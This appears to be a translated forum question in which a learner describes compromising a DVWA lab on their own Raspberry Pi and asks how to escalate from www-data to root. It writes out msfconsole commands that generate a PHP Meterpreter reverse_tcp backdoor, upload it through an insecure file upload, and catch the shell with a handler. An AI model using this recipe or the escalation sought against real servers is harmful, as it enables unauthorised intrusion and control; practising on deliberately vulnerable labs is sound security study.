我在搞乱 Kali Linux、MSFConsole 和 DVWA(该死的易受攻击的 Web 应用程序)。
通过创建 PHP 后门并通过 SQL 注入上传它,我成功地进入了系统(Raspberry Pi)。
现在我可以访问系统,唯一的问题是我作为 www-data 运行(成为 root 来创建自己的超级用户帐户不是很好吗?!)是否可以在 Linux 中以某种方式提升权限(Raspbaian)通过使用 MSFConsole、BASH(来自后门)还是其他方式?
我试图在 Meterpreter 提示符中运行“使用 priv”,但我得到的错误是“加载扩展失败:找不到名为 ext_server_priv.php 的模块”。如果有帮助,我会将 reverse_tcp 漏洞利用作为 PHP 脚本运行。
我能够通过运行这是 Msfconsole 来破坏系统
use php/meterpreter/reverse_tcp
set LHOST <my IP>
generate -t raw -f hackme.php
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <my IP>
exploit
然后我通过不安全的文件上传将 hackme.php 上传到网络服务器,完成后我浏览到上传的文件。
感谢这个视频给了我上面的代码。(我不得不使用 generate 函数而不是 msfpayload,因为该功能已被移动,因为它已被弃用。)